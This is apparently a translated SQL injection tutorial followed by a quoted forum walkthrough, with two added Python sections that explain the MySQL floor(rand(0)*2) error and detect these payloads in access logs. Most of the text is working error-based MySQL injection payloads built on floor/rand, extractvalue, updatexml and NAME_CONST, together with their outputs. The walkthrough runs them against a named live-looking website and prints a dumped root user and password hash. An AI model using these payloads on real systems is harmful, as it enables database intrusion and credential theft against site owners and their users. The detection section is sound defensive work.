1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the query you want.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
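Why the floor(rand(0)*2) query in section 1 above fails with ERROR 1062, as an added illustration that is not part of the original post: it ports MySQL's RAND(N) generator (randominit()/my_rnd() from the server source) and models how GROUP BY on a non-deterministic key evaluates the key once to probe the temporary table and again when inserting a missing row. The row counts and the version prefix are constructed inputs.

```python
# Added illustration (not from the original post): port of MySQL's RAND(N)
# generator plus a model of the GROUP BY temporary table that makes
# count(*) ... group by concat(..., floor(rand(0)*2)) fail with ERROR 1062.

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySQLRand:
    """randominit()/my_rnd() from the MySQL server, seeded as RAND(N) does."""

    def __init__(self, seed: int) -> None:
        # Item_func_rand::seed_random(): both seeds derive from the constant N,
        # so RAND(0) yields the same sequence on every call and every server.
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(n: int, seed: int = 0) -> list:
    """First n values of floor(rand(seed)*2); for seed 0: 0,1,1,0,1,1,..."""
    rng = MySQLRand(seed)
    return [int(rng.next() * 2) for _ in range(n)]


def simulate_group_by(row_count: int, prefix: str = "5.1.33-community-log") -> str:
    """Model grouping `row_count` rows on concat(prefix, floor(rand(0)*2)).

    MySQL keys a temporary table on the GROUP BY expression. Because the key
    is non-deterministic it is evaluated once to probe the table and, when the
    probe misses, evaluated AGAIN to build the row that gets inserted. With the
    sequence 0,1,1,0,1,... the third row probes '...0', misses, and then tries
    to insert '...1', which already exists. Returns 'ok' or the error text.
    """
    rng = MySQLRand(0)
    groups = {}  # group_key -> count(*)
    for _ in range(row_count):
        probe = prefix + str(int(rng.next() * 2))
        if probe in groups:
            groups[probe] += 1
            continue
        insert_key = prefix + str(int(rng.next() * 2))  # second evaluation
        if insert_key in groups:
            return "ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % insert_key
        groups[insert_key] = 1
    return "ok"
```

This is also why the technique needs a source table with at least three rows: two rows group cleanly and only the third collides.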
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection techniques for newer MySQL versions: injecting via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|    1 |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
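Detection for everything this page covers, as an added example that is not part of the original post or the quoted tutorial: every payload shown here depends on one of four MySQL functions (floor(rand(...)), extractvalue(), updatexml(), name_const()) and on the application echoing the database error back to the client, so both the request side and the response side can be checked. The access-log lines and the log-format regex are constructed assumptions.

```python
# Added detection example (not from the original post): flag the error-based
# MySQL injection primitives shown on this page in web access logs, and spot
# responses that leak the database error text those primitives rely on.
import re
from urllib.parse import urlsplit, unquote_plus

# The functions every payload on this page depends on. Legitimate query
# parameters essentially never contain them, so each match is high-signal.
ERROR_BASED_FUNCS = re.compile(
    r"\b(floor\s*\(\s*rand|extractvalue\s*\(|updatexml\s*\(|name_const\s*\()",
    re.IGNORECASE,
)
# Error strings that only reach the client when the app displays DB errors.
LEAKED_ERRORS = re.compile(
    r"Duplicate entry '.*' for key|XPATH syntax error|Duplicate column name"
)


def decode_query(url: str) -> str:
    """Query string as the database sees it: '+' and %xx decoded, so
    URL-encoded spacing cannot hide the keywords."""
    return unquote_plus(urlsplit(url).query)


def classify_request(url: str):
    """Name of the matched primitive (e.g. 'name_const'), or None if clean."""
    m = ERROR_BASED_FUNCS.search(decode_query(url))
    return m.group(1).lower().split("(")[0].strip() if m else None


def leaks_db_error(response_body: str) -> bool:
    """True if the page text carries a MySQL error that echoes query output."""
    return LEAKED_ERRORS.search(response_body) is not None


# Constructed sample access-log lines (combined log format, abbreviated).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /qcwh/content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 300
"""
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def scan_log(log_text: str) -> list:
    """(client_ip, primitive) for every request line that matches."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        kind = classify_request(m.group(2)) if m else None
        if kind:
            hits.append((m.group(1), kind))
    return hits
```

The response-side check matters independently of the request filter: an id parameter that is validated as an integer before reaching the query removes the injection, and turning off displayed database errors removes the channel these primitives read from.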